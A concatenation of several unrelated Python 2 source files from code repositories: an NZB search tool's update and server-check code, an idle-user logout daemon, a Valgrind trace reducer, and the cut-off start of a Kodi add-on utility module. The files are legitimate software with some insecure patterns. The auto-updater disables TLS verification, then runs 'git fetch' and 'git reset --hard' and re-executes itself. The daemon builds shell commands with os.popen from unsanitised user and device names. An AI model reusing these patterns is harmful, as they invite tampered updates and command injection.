for module in SearchModule.loadedModules:
if( module.typesrch == 'OMG'):
module.search('Ubuntu', cfg_tmp)
print cfg_tmp['retcode']
if(cfg_tmp['retcode'][0] != 200):
ret = 0
#~ server based API
if(args['type'] == 'NAB'):
ret = 1
cfg_tmp = {'url': args['hostname'],
'type': 'NAB',
'api': args['api'],
'speed_class': 2,
'extra_class': 0,
'valid': 1,
'timeout': self.cgen['timeout_class'][2],
'builtin': 0 }
for module in SearchModule.loadedModules:
if( module.typesrch == 'NAB'):
module.search('Ubuntu', cfg_tmp)
print cfg_tmp['retcode']
if(cfg_tmp['retcode'][0] != 200):
ret = 0
#~ server based WEB
if(args['type'] == 'DSN' or args['type'] == 'DS_GNG'):
cfg_deep_tmp = [{'url': args['hostname'],
'user':args['user'],
'pwd': args['pwd'],
'type': args['type'],
'speed_class': 2,
'extra_class': 0,
'valid': 1,
}]
ds_tmp = DeepsearchModule.DeepSearch(cfg_deep_tmp, self.cgen)
ret_bool = ds_tmp.ds[0].search('Ubuntu')
if(ret_bool):
ret = 1
else:
ret = 0
return ret
#~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
class ChkVersion:
def __init__(self, debugflag=False):
self.dirconf= os.getenv('OPENSHIFT_DATA_DIR', '')
self.dirconf_local = os.path.dirname(os.path.realpath(__file__))+'/'
if getattr(sys, 'frozen', False):
self.dirconf_local = os.path.dirname(sys.executable)+'/'
self.ver_notify = { 'chk':-1,
'curver': -1,
'os':-1}
self.chk_update_ts = 0
self.chk_update_refreshrate = 3600 * 4
if(debugflag == False):
self.chk_update()
def chk_update(self):
dt1 = (datetime.datetime.now() - datetime.datetime.fromtimestamp(self.chk_update_ts))
dl = (dt1.days+1) * dt1.seconds
if(dl > self.chk_update_refreshrate):
if (sys.platform.startswith('linux') and len(self.dirconf)==0):
self.ver_notify['os'] = 'linux'
else:
self.ver_notify['os'] = 'other'
if (len(self.dirconf)):
self.ver_notify['os'] = 'openshift'
print '>> Checking for updates...'
self.chk_local_ver()
self.ver_notify['chk'] = self.chk_repos_ver()
self.chk_update_ts = time.time()
def chk_local_ver(self):
verify_str = '80801102808011028080110280801102'
usedir = self.dirconf_local
if (len(self.dirconf)):
usedir = self.dirconf
with open(usedir+'vernum.num') as f:
content = f.readlines()
vals = content[0].split(' ')
if(vals[0] == verify_str):
self.ver_notify['curver'] = float(vals[1])
def autoupdate(self):
#~ linux only, sorry win users
if (sys.platform.startswith('linux') and len(self.dirconf)==0):
#~ print 'MISCDEFS: THIS LINE HAS TO BE REMOVED BEFORE DEPLOYMENT'
mssg = '>> Running autoupdate on Linux platform'
print mssg
log.info(mssg)
subprocess.call(["git", "fetch"])
subprocess.call(["git", "reset", "--hard", "origin/master"])
pythonscr = sys.executable
os.execl(pythonscr, pythonscr, * sys.argv)
def chk_repos_ver(self):
verify_str = '80801102808011028080110280801102'
url_versioning = 'https://raw.github.com/pillone/usntssearch/master/NZBmegasearch/vernum.num'
#~ print 'MISCDEFS: TO REMOVE LINE IN AUTOUPD BEFORE DEPLOYMENT'
try:
http_result = requests.get(url=url_versioning, verify=False)
#~ print http_result.text
vals = http_result.text.split(' ')
cur_ver = float(vals[1])
if(vals[0] != verify_str):
return -1
if(self.ver_notify['curver'] < cur_ver):
print '>> A newer version is available. User notification on.'
#~ in case of supported platforms this is never executed, but autoupdated
self.autoupdate()
return 1
else:
if(self.ver_notify['curver'] == cur_ver):
print '>> This is the newest version available'
return 0
except Exception as e:
mssg = str(e)
print mssg
log.critical(mssg)
return -1
| AntonioMtn/NZBMegaSearch | miscdefs.py | Python | gpl-2.0 | 12,563 |
#!/usr/bin/env python
""" Marcos Moyano - marcos@anue.biz
Logout users of a specified period of idle time.
Copyright (c) 2006 Marcos Moyano
This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License version 2 as published by
the Free Software Foundation.
"""
__revision__ = "$Id: idleoutd 2007-6-11 $"
import os, sys, smtplib
from time import sleep
from re import compile as comp
from re import match
from logging import fatal, info, warning, DEBUG, getLogger, Formatter
from logging.handlers import RotatingFileHandler
G_FILE = "/etc/group"
P_FILE = "/etc/passwd"
### Necesary data ###
USR_BY_NAME = {}
GROUP_BY_NAME = {}
PROCS = {}
NO_BANN = []
BANN = {}
PRINTINFO = 0
PRINTVERSION = "0.8.1"
LOG_FLAG = 0
####################
# Manage arguments #
####################
if len(sys.argv[1:]) == 1:
DEBUGG = sys.argv[1]
if DEBUGG == "-D" or DEBUGG == "-d" or DEBUGG == "--debug":
PRINTINFO = 1
elif DEBUGG == "-h" or DEBUGG == "--help":
printhelp()
sys.exit(0)
elif DEBUGG == "-v" or DEBUGG == "-V" or DEBUGG == "--version":
print ("idleoutd version is: %s \n" % PRINTVERSION)
sys.exit(0)
else:
print ("idleoutd: Invalid argument -- %s\n\
Try 'idleoutd -h' or 'idleoutd --help' for more information." % DEBUGG)
sys.exit(1)
elif len(sys.argv[1:]) > 1:
print ("To many arguments: %d recieved, 1 expected.\n\
Try 'idleoutd -h' or 'idleoutd --help'" % len(sys.argv[1:]))
sys.exit(1)
#### End of manage arguments ####
##################
# Print Help Msg #
##################
def printhelp():
"""
Print help information.
"""
print """Logout users of a specified period of idle time.
Usage: idleoutd [OPTION]
-D, -d, --debug Print debug information to the screen every 60 seconds.
-V, -v, --version Print version information and exit.
-h, --help Print this help and exit.
Report bugs to <marcos@anue.biz>."""
return
#### End of print help ####
######################
# Define logging way #
######################
def logg(LOG_FILE, LOG_SIZE):
"""
Configuration of the log file.
"""
RLOG = getLogger('')
handler = RotatingFileHandler(LOG_FILE, 'a', LOG_SIZE * 1024 * 1024, 10)
RLOG.addHandler(handler)
RLOG.setLevel(DEBUG)
formatter = Formatter('%(asctime)s: %(levelname)-8s %(message)s','%b %d %H:%M:%S')
handler.setFormatter(formatter)
return
#### End of define logging ####
##################
# Get group info #
##################
def fetch_group(group, param):
'''
Fetch all the users in /etc/passwd with the same group id as "group".
'''
tmp = []
gid = ""
mygfile = open(G_FILE,'r')
for lines in mygfile.readlines():
line = lines.strip()
name = line.split(':')[0]
if group == name:
gid = line.split(':')[2]
break
mygfile.close()
mypfile = open(P_FILE,'r')
for lines in mypfile.readlines():
line = lines.strip()
guid = line.split(':')[3]
if gid == guid:
tmp.append(line.split(":")[0])
mypfile.close()
GROUP_BY_NAME[group] = (tmp, param)
return (GROUP_BY_NAME)
#### End of get group info ####
#################
# Group defined #
#################
def group_define(spar, param):
"""
Fetch users from the specified group.
"""
idle_time = param[0].split("=")[1]
GROUP_BY_NAME = fetch_group(spar, param)
try:
filed = open(G_FILE,'r')
for lines in filed.readlines():
line = lines.strip()
if spar == str(line.split(':')[0]):
tmp = line.split(':')
groups = tmp[len(tmp)-1]
filed.close()
lofusr = GROUP_BY_NAME[spar][0]
groups = groups.split(',')
for x in lofusr:
if x not in groups:
groups.append(x)
if int(idle_time) == 0:
for x in groups:
if x not in NO_BANN:
NO_BANN.append(x)
for y in GROUP_BY_NAME.keys():
if x in GROUP_BY_NAME[y][0]:
GROUP_BY_NAME[y] = (GROUP_BY_NAME[y][0][1:], param)
if GROUP_BY_NAME[y][0] == []:
del GROUP_BY_NAME[y]
else:
for usr in groups:
if usr not in NO_BANN:
GROUP_BY_NAME[spar] = (groups, param)
except Exception, err:
warning("%s -> %s " % (err.__class__ , err))
warning("I was unable to open file %s." % G_FILE)
#### end of group definded ####
################
# User defined #
################
def usr_define(spar, param):
"""
Fetch the specified user.
"""
try:
filed = open(P_FILE,'r')
for lines in filed.readlines():
line = lines.strip()
user = str(line.split(':')[0])
if spar == user:
itime = int(param[0].split('=')[1])
if itime == 0:
if spar not in NO_BANN:
NO_BANN.append(spar)
else:
if spar in NO_BANN:
NO_BANN.remove(spar)
USR_BY_NAME[spar] = param
filed.close()
if spar not in USR_BY_NAME.keys() and spar not in NO_BANN:
info("Config file --> User %s is not defined in system." % spar)
except Exception, err:
warning("%s -> %s " % (err.__class__ , err))
warning("I was unable to open file %s." % P_FILE)
#### end of user definded ####
##################
# Get info #
##################
def get_info(LOG_FLAG):
"""
Parse the configuration file.
"""
try:
from idleoutconf import log, logsize, pid, host, port, domain
from idleoutconf import group, name
if LOG_FLAG != 1:
logg(log, int(logsize))
# Don't open another logging instance!
LOG_FLAG = 1
global smtp
smtp = [host, int(port), domain]
reg1 = comp('(\s+)\=(\s+)')
for users in name:
users = reg1.sub("=", users.strip())
usrtmp = users.split()
usrname = usrtmp[0]
rest = usrtmp[1:]
usr_define(usrname, rest)
for groups in group:
groups = reg1.sub("=", groups.strip())
grtmp = groups.split()
groupname = grtmp[0]
rest = grtmp[1:]
group_define(groupname, rest)
return(pid)
except Exception, err:
print >> sys.stderr, "Error: %d: %s" % (err.errno, err.strerror)
sys.exit(err.errno)
#### end get info ####
##################
# Compute info #
##################
def compute(process):
"""
Manage all the information and call the require events.
"""
tmp = [x for x, y in BANN.iteritems() if x not in process.keys()]
for x in tmp:
del BANN[x] # Clean people who got back
for x, y in process.iteritems():
user = x.split(',')[0]
dev = x.split(',')[1]
time = int(y[0])
# Search in user define dictionary
if USR_BY_NAME.has_key(user):
idtm = int(USR_BY_NAME[user][0].split('=')[1])
if time >= idtm:
grace = int(USR_BY_NAME[user][1].split('=')[1])
silent = USR_BY_NAME[user][3].split('=')[1]
if x in BANN.keys():
if BANN[x] >= grace:
del BANN[x]
if silent == "no":
bann_usr(x, y[1], grace, 0) # Bann the user
else:
# Bann the user with silent
bann_usr(x, y[1], grace, 1)
mail = USR_BY_NAME[user][2].split('=')[1]
if mail == "yes":
send_mail(user, dev)
else:
BANN["%s" % x] = int(BANN[x]) + 1
else:
ret = checkcon(x)
if ret == 0:
BANN["%s" % x] = 1
if silent == "no":
notify(user, dev, grace) # Notify the user
else:
# No ssh session - Banning with silent
bann_usr(x, y[1], grace, 1)
else:
if x in BANN.keys():
del BANN[x]
else:
"""
Group search:
We'll grab the lowest idle configuration available. In addition we'll grab the
corresponding grace and mail configuration for that particular user.
By default we set the mail configuration to "no". If it needs to change it will do so.
"""
# Big number just to make sure idle time is lower in the first run
loweridt = 1000
lowgrace = 0
lowmail = "no"
silent = "no"
# Search in group define dictionary for the lowest idle time.
for j, k in GROUP_BY_NAME.iteritems():
if user in k[0]:
idtm = int(GROUP_BY_NAME[j][1][0].split('=')[1])
if idtm < loweridt:
loweridt = idtm
lowgrace = int(GROUP_BY_NAME[j][1][1].split('=')[1])
lowmail = GROUP_BY_NAME[j][1][2].split('=')[1]
silent = GROUP_BY_NAME[j][1][3].split('=')[1]
if time >= loweridt:
if x in BANN.keys():
if BANN[x] >= lowgrace:
del BANN[x]
if silent == "no":
bann_usr(x, y[1], lowgrace, 0) # Bann the user
else:
# Bann the user with silent
bann_usr(x, y[1], lowgrace, 1)
if lowmail == "yes":
send_mail(user, dev)
else:
BANN["%s" % x] = int(BANN[x]) + 1
else:
ret = checkcon(x)
if ret == 0:
BANN["%s" % x] = 1
if silent == "no":
notify(user, dev, lowgrace) # Notify the user
else:
bann_usr(x, y[1], lowgrace, 1)
else:
if x in BANN.keys():
del BANN[x]
#### End of compute ####
##################
# Notify user #
##################
def notify(user, dev, grace):
"""
Notify the user that he is going to be kicked out.
"""
fdr = "/dev/"+dev
seconds = grace*60
try:
tonot = open(fdr,'a')
tonot.write("\n\r\n<<< MESSAGE FROM IDLEOUT >>>\n\n\
\r\tYou have been idle for too long.\n\
\r\tIf you don't send an alive signal in the next %d seconds you will be kicked out!\n\n\
\r<<< END OF MESSAGE >>>\n\n" % seconds)
tonot.close()
warning("USER %s idle on DEVICE %s --> NOTIFYING!" % (user, dev))
except Exception, err:
warning("%s -> %s " % (err.__class__ , err))
warning("I was unable to open device %s." % fdr)
#### end of notify user ####
##########################
# check ssh connection #
##########################
def checkcon(info):
"""
Look for the sshd process of the specified user in the specified device.
"""
user = info.split(',')[0]
device = info.split(',')[1]
sshd = os.popen("ps -ef | grep %s | grep %s | grep sshd | grep -v \"grep\" | head -n 1" % (device, user), 'r')
sshd = sshd.read()
if sshd:
sshd = sshd.strip().split()
else:
warning("USER %s not on DEVICE %s --> KICKING OUT!" % (user, device))
return (1)
if sshd[5] == "?" and sshd[7] == "sshd:":
if sshd[8].strip() == "%s@%s" % (user.strip(), device.strip()):
return (0) # Found ssh session
else:
return (1) # There is no ssh session for the user in the device.
#### End of checkcon ####
###############
# Bann user #
###############
def bann_usr(user, pids, seconds, silent):
"""
Kick out the specified user.
"""
usr = user.split(',')[0]
device = user.split(',')[1]
seconds = int(seconds)*60
fdr = "/dev/"+device
warning("USER %s --> timeout on DEVICE %s --> KICKING OUT!" % (usr, device))
if int(silent) == 0:
try:
tonot = open(fdr,'a')
tonot.write("\n\r\n<<< MESSAGE FROM IDLEOUT >>> \n\n\
\r\tYour %s seconds has expired.\n\
\r\tKicking out user: %s\n\n\
\r<<< END OF MESSAGE >>>\n\n" % (seconds, usr))
tonot.close()
except Exception, err:
warning("%s -> %s " % (err.__class__ , err))
warning("I was unable to open device %s." % fdr)
for process in pids.split():
process = int(process)
try:
os.kill(process, 9)
except Exception, e:
warning("%s -> %s " % (e.__class__ , e))
warning("Process don't exist or error killing it (%d)" % process)
#### End of bann user ####
#############
# Get pids #
#############
def get_pids(idle_pos, name_pos, dev_pos):
"""
Find the idle info and processes of the users currently logged in.
"""
PROCS = {}
info1 = os.popen("finger | cut -c %s,%s,%s | sed 1d | egrep -v \"\*:0\" | sort | uniq" % (name_pos, dev_pos, idle_pos), "r")
for line in info1:
c = line.split()
# Added to check differences between distros. Distros like SuSE use this.
if "*" == c[1][0]:
c[1] = c[1][1:]
if c[0] not in NO_BANN:
if len(c) == 3:
try:
t = int(c[2])
except ValueError:
if ":" in c[2]:
t = c[2].strip()
t = int(t.split(':')[0])*60 + int(t.split(':')[1])
elif "d" in c[2]:
t = c[2].strip()
t = int(t)*60*24
lo = os.popen("ps -eo \"%s\" | awk '{print $3 \" \" $1 \" \" $2}' | grep %s | grep %s | egrep -v \"grep\" | awk '{print $2}' | xargs" % ("%p %y %U", c[0], c[1]), "r")
for li in lo.readlines():
li = li.strip()
info("USER: %s --> DEVICE: %s --> IDLE TIME: %s --> PROCESSES: %s" % (c[0], c[1], str(t), li))
PROCS["%s,%s" % (c[0], c[1])] = (t, li)
return(PROCS)
#### end of get_pids ####
##########################
# Check for SMTP service #
##########################
def check_smtp():
"""
Check for the SMTP service.
"""
try:
server = smtplib.SMTP(smtp[0], smtp[1])
except Exception, err:
warning("%s -> Exit code %s -> Message: %s" % (err.__class__ , err[0], err[1]))
return(1)
server.quit()
return(0)
#### end of check SMTP ####
#############
# Send mail #
#############
def send_mail(user, dev):
"""
Send an email to the specified user explaining the situation.
"""
ecode = check_smtp()
if ecode != 0:
warning("An SMTP error ocurred. NOT sending email.")
return
pid = os.fork()
if pid > 0:
sys.exit(0)
domain = smtp[2]
if domain.lower() != "none":
toaddrs = "%s@%s" % (user, domain)
fromaddr = "%s@%s" % ("idleout", domain)
else:
toaddrs = user
fromaddr = "idleout"
line = "You have been idle for too long.\n\
Idleout has decided to terminate your conection on device %s.\n" % dev
msg = ("From: %s\r\nTo: %s\r\n\r\n%s" % (fromaddr, toaddrs, line))
try:
server = smtplib.SMTP(smtp[0], smtp[1])
server.set_debuglevel(0)
server.sendmail(fromaddr, toaddrs, msg)
server.quit()
info("Email sent to user %s" % user )
except Exception, err:
warning("%s -> Exit code %s -> Message: %s" % (err.__class__ , err[0], err[1]))
warning("An SMTP error ocurred. NOT sending email.")
#### end of send_mail ####
#####################
# Get Idle position #
#####################
def get_pos():
'''
Function to find the locations of "Name", "Tty" and "Idle" from the finger command.
'''
idle = os.popen("finger | head -n 1", "r")
line = idle.readline().strip()
tmp = line.find("Idle") + 1
idle_pos = str("%d-%d" % (tmp - 1, tmp + 4))
tmp = line.find("Name")
name_pos = str("%d-%d" % (1, tmp))
tmp = line.find("Tty")
dev_pos = str("%d-%d" % (tmp, tmp + 7))
return(idle_pos, name_pos, dev_pos)
#### End of get_pos ####
####################
# Print debug info #
####################
def prinfo(PROCS, usr_name, group_name, nobann, ybann, smtp):
"""
Print the DEBUG information.
"""
print " <<<<< DEBUG MODE >>>>> "
print "---------------------------------------------------------"
print " <<< SMTP DIRECTIVES FROM CONFIG FILE >>>\n"
host = smtp[0]
port = smtp[1]
domain = smtp[2]
print ("HOST: %s --> PORT: %d --> DOMAIN: %s" % (host, port, domain))
print "---------------------------------------------------------"
print " <<< USER DIRECTIVES FROM CONFIG FILE >>>"
for name in usr_name.keys():
print ("USER: %s " % name)
tmp = " ".join(usr for usr in usr_name[name])
print ("CONFIGURATION: %s" % tmp)
print "---------------------------------------------------------"
print " <<< GROUP DIRECTIVES FROM CONFIG FILE >>>"
for group in group_name.keys():
print ("GROUP: %s" % group)
tmp = " ".join(usr for usr in group_name[group][0])
tmp1 = " ".join(conf for conf in group_name[group][1])
print ("USERS IN GROUP: %s" % tmp)
print ("CONFIGURATION: %s" % tmp1)
print "---------------------------------------"
tmp = " ".join(usr for usr in nobann)
print "---------------------------------------------------------"
print ("USERS THAT WILL NEVER BE KICKED OUT: %s" % tmp)
print "---------------------------------------------------------"
print "IDLE USERS: "
for info in PROCS.keys():
user = info.split(',')[0]
dev = info.split(',')[1]
time = PROCS[info][0]
print ("USER: %s --> DEVICE: %s --> IDLE TIME: %s" % (user, dev, time))
print "---------------------------------------------------------"
print " <<< PROCESSES OF IDLE USERS: >>>\n"
for info in PROCS.keys():
user = info.split(',')[0]
dev = info.split(',')[1]
pro = PROCS[info][1]
print ("USER: %s --> DEVICE: %s --> PROCESSES: %s" % (user , dev, pro))
print "---------------------------------------------------------"
print "<<< GRACE: USERS THAT WILL (eventually) BE KICKED OUT >>>\n"
for info in ybann.keys():
user = info.split(',')[0]
dev = info.split(',')[1]
gra = ybann[info]
print ("USER: %s --> DEVICE: %s --> GRACE MINUTE: %s" % (user, dev, gra))
print "\n#########################################################"
print " <<< Sleeping for 60 seconds >>> "
print "#########################################################\n"
#### End of prinfo ####
###########
# MAIN #
###########
def main():
"""
Main function.
"""
try:
count = 1
# Just at the beginning to get positions in finger.
#These positions changes between distros.
(id_pos, name_pos, dev_pos) = get_pos()
while True:
if count == 30:
count = 1
# Read conf file at start and every 30 minutes
get_info(LOG_FLAG)
else:
count = count + 1
PROCS = get_pids(id_pos, name_pos, dev_pos)
try:
compute(PROCS)
except Exception, err:
warning("%s -> %s " % (err.__class__ , err))
if PRINTINFO == 1:
prinfo(PROCS, USR_BY_NAME, GROUP_BY_NAME, NO_BANN, BANN, smtp)
sleep(60) # Sleep for 60 seconds
except:
print "Signal caught. Exiting!"
sys.exit(1)
#### End of MAIN :) ####
if __name__ == "__main__":
try:
sys.path.append('/etc/idleout')
LOG_FLAG = 0
pidfile = get_info(LOG_FLAG)
except Exception, err:
print ("%s -> %s " % (err.__class__ , err))
sys.exit(1)
info("<<< Starting Idleout daemon >>>")
try:
import psyco # try to speed up :)
psyco.full()
except ImportError:
info("Psyco is not installed, the program will just run a bit slower")
pass
if PRINTINFO == 1:
info("<<< Idleout daemon started in debug mode >>>")
main()
else:
try:
pid = os.fork()
if pid > 0:
sys.exit(0) # exit first parent
except OSError, e:
print >> sys.stderr, "fork 1 failed: %d (%s)" % (e.errno, e.strerror)
fatal("I was unable to fork into a deamon")
sys.exit(1)
try:
os.chdir("/")
except Exception, err:
info("%s -> %s " % (err.__class__ , err))
pass
try:
os.setsid()
except Exception, err:
info("%s -> %s " % (err.__class__ , err))
pass
try:
os.umask(0)
except Exception, err:
info("%s -> %s " % (err.__class__ , err))
pass
try:
pid = os.fork()
if pid > 0:
myfile = open(pidfile, 'w')
myfile.write(str(pid) + '\n')
myfile.close()
info("<<< Idleout daemon started - Pid: %s >>>" % str(pid))
sys.exit(0)
except OSError, err:
print >> sys.stderr, "fork 2 failed: %d: %s" % (err.errno, err.strerror)
fatal("I was unable to fork into a deamon")
sys.exit(1)
# Start the daemon
main()
| marcosmoyano/idleout | src/idleoutd.py | Python | gpl-2.0 | 22,171 |
#!/usr/bin/python
# This program processes an address trace generated by the Valgrind lackey tool
# to create a reduced trace according to the Fastslim-Demand algorithm
# described in "FastSlim: prefetch-safe trace reduction for I/O cache
# simulation" by Wei Jin, Xiaobai Sun, and Jeffrey S. Chase in ACM Transactions
# on Modeling and Computer Simulation, Vol. 11, No. 2 (April 2001),
# pages 125-160. http://doi.acm.org/10.1145/384169.384170
import fileinput
import sys
import argparse
from operator import attrgetter
class TraceItem(object):
def __init__(self, reftype, pg, tstamp):
self.reftype = reftype
self.pg = pg
self.tstamp = tstamp
self.marked = False
def __eq__(self, other):
return self.pg == other.pg
def __repr__(self):
return self.reftype + " " + format(self.pg*4096,'x')
def __hash__(self):
return hash(self.pg)
ts = 0 # "timestamp" (entry number in original trace)
tracebuffer = set() # The set of entries in the buffer
toprint = [] # The list of entries waiting to be printed in order
# Emit in timestamp order may have to hold onto items until the trace buffer
# is emptied, because there may be marked items in the trace buffer with
# earlier timestamps that have to appear in the output first.
# So, we put entries into a list as they are first seen and then
# emit_marked adds all marked items to the list.
# The list is then sorted by timestamp and printed.
def emit_marked_in_ts_order():
for ti in tracebuffer:
if ti.marked:
toprint.append(ti)
toprint.sort(key=attrgetter('tstamp'))
for ti in toprint:
print ti
tracebuffer.clear()
del toprint[:]
# Parse command line arguments
parser = argparse.ArgumentParser(description="Reduce address trace from valgrind using fastslim-demand algorithm.")
parser.add_argument('-k', '--keepcode', action='store_true', help="include code pages in compressed trace")
parser.add_argument('-b', '--buffersize', type=int, default=4, help="number of entries in trace buffer")
parser.add_argument('tracefile', nargs='?', default="-")
args = parser.parse_args()
# Process input trace
for line in fileinput.input(args.tracefile):
if line[0] == '=':
continue
reftype = line[0:2].strip()
if reftype == "I" and args.keepcode == False:
continue
addrstr = line.split(',')[0][3:].strip()
try:
addr = int(addrstr, 16)
except ValueError:
#print "This does not appear to be valgrind output, skipping: " + line
continue
pg = addr / 4096
ti = TraceItem(reftype,pg,ts)
if ti in tracebuffer:
ti.marked = True
ti.tstamp = ts
else:
if (len(tracebuffer) == args.buffersize):
emit_marked_in_ts_order()
toprint.append(ti)
tracebuffer.add(ti)
ts = ts + 1
| 2nd47/UofT-Projects | CSC369/Virtual Memory/traceprogs/fastslim.py | Python | gpl-2.0 | 2,771 |
#
# Copyright (C) 2014-2015
# Sean Poyser (seanpoyser@gmail.com)
#
# This Program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# This Program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with XBMC; see the file COPYING. If not, write to
# the Free Software Foundation, 675 Mass Ave, Cambridge, MA 02139, USA.
# http://www.gnu.org/copyleft/gpl.html
#
import xbmc
import xbmcaddon
import xbmcgui
import os
import re
import sfile
def GetXBMCVersion():
#xbmc.executeJSONRPC('{ "jsonrpc": "2.0", "method": "Application.GetProperties", "params": {"properties": ["version", "name"]}, "id": 1 }')
version = xbmcaddon.Addon('xbmc.addon').getAddonInfo('version')
version = version.split('.')
return int(version[0]), int(version[1]) #major, minor eg, 13.9.902
ADDONID = 'plugin.program.super.favourites'
ADDON = xbmcaddon.Addon(ADDONID)
HOME = ADDON.getAddonInfo('path')
ROOT = ADDON.getSetting('FOLDER')
if not ROOT:
ROOT = 'special://profile/addon_data/plugin.program.super.favourites/'
SHOWXBMC = ADDON.getSetting('SHOWXBMC') == 'true'
INHERIT = ADDON.getSetting('INHERIT') == 'true'
ALPHA_SORT = ADDON.getSetting('ALPHA_SORT') == 'true'
LABEL_NUMERIC = ADDON.getSetting('LABEL_NUMERIC') == 'true'
LABEL_NUMERIC_QL = ADDON.getSetting('LABEL_NUMERIC_QL') == 'true'
PROFILE = os.path.join(ROOT, 'Super Favourites')
VERSION = ADDON.getAddonInfo('version')
ICON = os.path.join(HOME, 'icon.png')
FANART = os.path.join(HOME, 'fanart.jpg')
SEARCH = os.path.join(HOME, 'resources', 'media', 'search.png')
GETTEXT = ADDON.getLocalizedString
TITLE = GETTEXT(30000)
DISPLAYNAME = 'Kodi'
NUMBER_SEP = ' | '
PLAYABLE = xbmc.getSupportedMedia('video') + '|' + xbmc.getSupportedMedia('music')
PLAYABLE = PLAYABLE.replace('|.zip', '')
PLAYABLE = PLAYABLE.split('|')
PLAYMEDIA_MODE = 1
ACTIVATEWINDOW_MODE = 2
RUNPLUGIN_MODE = 3
ACTION_MODE = 4
HOMESPECIAL = 'special://home/'
HOMEFULL = xbmc.translatePath(HOMESPECIAL)
DEBUG = ADDON.getSetting('DEBUG') == 'true'
KEYMAP_HOT = 'super_favourites_hot.xml'
KEYMAP_MENU = 'super_favourites_menu.xml'
MAJOR, MINOR = GetXBMCVersion()
FRODO = (MAJOR == 12) and (MINOR < 9)
GOTHAM = (MAJOR == 13) or (MAJOR == 12 and MINOR == 9)
HELIX = (MAJOR == 14) or (MAJOR == 13 and MINOR == 9)
ISENGARD = (MAJOR == 15) or (MAJOR == 14 and MINOR == 9)
KRYPTON = (MAJOR == 17) or (MAJOR == 16 and MINOR == 9)
ESTUARY = xbmc.getCondVisibility('System.HasAddon(%s)' % 'skin.estuary') == 1
FILENAME = 'favourites.xml'
FOLDERCFG = 'folder.cfg'
def Log(text):
log(text)
def log(text):
try:
output = '%s V%s : %s' % (TITLE, VERSION, str(text))
if DEBUG:
xbmc.log(output)
else:
xbmc.log(output, xbmc.LOGDEBUG)
except:
pass
def DialogOK(line1, line2='', line3=''):
d = xbmcgui.Dialog()
d.ok(TITLE + ' - ' + VERSION, line1, line2 , line3)
def DialogYesNo(line1, line2='', line3='', noLabel=None, yesLabel=None):
d = xbmcgui.Dialog()
if noLabel == None or yesLabel == None:
return d.yesno(TITLE + ' - ' + VERSION, line1, line2 , line3) == True
else:
return d.yesno(TITLE + ' - ' + VERSION, line1, line2 , line3, noLabel, yesLabel) == True
def Progress(title, line1 = '', line2 = '', line3 = ''):
dp = xbmcgui.DialogProgress()
dp.create(title, line1, line2, line3)
dp.update(0)
return dp
def generateMD5(text):
if not text:
return ''
try:
import hashlib
return hashlib.md5(text).hexdigest()
except:
pass
try:
import md5
return md5.new(text).hexdigest()
except:
pass
return '0'
def LaunchSF():
xbmc.executebuiltin('ActivateWindow(videos,plugin://%s)' % ADDONID)
def CheckVersion():
try:
prev = ADDON.getSetting('VERSION')
curr = VERSION
if prev == curr:
return
verifySuperSearch()
VerifySettinngs()
VerifyZipFiles()
src = os.path.join(ROOT, 'cache')
dst = os.path.join(ROOT, 'C')
sfile.rename(src, dst)
ADDON.setSetting('VERSION', curr)
if prev == '0.0.0' or prev == '1.0.0':
sfile.makedirs(PROFILE)
#call showChangeLog like this to workaround bug in openElec
script = os.path.join(HOME, 'showChangelog.py')
cmd = 'AlarmClock(%s,RunScript(%s),%d,True)' % ('changelog', script, 0)
xbmc.executebuiltin(cmd)
except:
pass
def VerifyZipFiles():
#cleanup corrupt zip files
sfile.remove(os.path.join('special://userdata', '_sf_temp.zip'))
sfile.remove(os.path.join('special://userdata', 'SF_Temp'))
def VerifySettinngs():
#patch any settings that have changed types or values
if ADDON.getSetting('DISABLEMOVIEVIEW') == 'true':
ADDON.setSetting('DISABLEMOVIEVIEW', 'false')
ADDON.setSetting('CONTENTTYPE', '')
def verifySuperSearch():
old = os.path.join(ROOT, 'Search')
dst = os.path.join(ROOT, 'S')
sfile.rename(old, dst)
try: sfile.makedirs(dst)
except: pass
src = os.path.join(HOME, 'resources', 'search', FILENAME)
dst = os.path.join(dst, FILENAME)
if not sfile.exists(dst):
sfile.copy(src, dst)
try:
#patch any changes
xml = sfile.read(dst)
xml = xml.replace('is/?action=movies_search&', 'is/?action=movieSearch&')
xml = xml.replace('is/?action=people_movies&', 'is/?action=moviePerson&')
xml = xml.replace('is/?action=shows_search&', 'is/?action=tvSearch&')
xml = xml.replace('is/?action=people_shows&', 'is/?action=tvPerson&')
f = sfile.file(dst, 'w')
f.write(xml)
f.close()
except:
pass
import favourite
new = favourite.getFavourites(src, validate=False)
#line1 = GETTEXT(30123)
#line2 = GETTEXT(30124)
for item in new:
fave, index, nFaves = favourite.findFave(dst, item[2])
if index < 0:
#line = line1 % item[0]
#if DialogYesNo(line1=line, line2=line2):
favourite.addFave(dst, item)
def UpdateKeymaps():
if ADDON.getSetting('HOTKEY') != GETTEXT(30111): #i.e. not programmable
DeleteKeymap(KEYMAP_HOT)
DeleteKeymap(KEYMAP_MENU)
VerifyKeymaps()
def DeleteKeymap(map):
path = os.path.join('special://profile/keymaps', map)
DeleteFile(path)
def DeleteFile(path):
tries = 5
while sfile.exists(path) and tries > 0:
tries -= 1
try:
sfile.remove(path)
except:
xbmc.sleep(500)
def verifyLocation():
#if still set to default location reset, to workaround
#Android bug in browse folder dialog
location = ADDON.getSetting('FOLDER')
profile = 'special://profile/addon_data/plugin.program.super.favourites/'
userdata = 'special://userdata/addon_data/plugin.program.super.favourites/'
if (location == profile) or (location == userdata):
ADDON.setSetting('FOLDER', '')
def verifyPlugins():
folder = os.path.join(ROOT, 'Plugins')
if sfile.exists(folder):
return
try: sfile.makedirs(folder)
except: pass
def VerifyKeymaps():
reload = False
scriptPath = ADDON.getAddonInfo('profile')
scriptPath = os.path.join(scriptPath, 'captureLauncher.py')
if not sfile.exists(scriptPath):
DeleteKeymap(KEYMAP_MENU) #ensure gets updated to launcher version
src = os.path.join(HOME, 'captureLauncher.py')
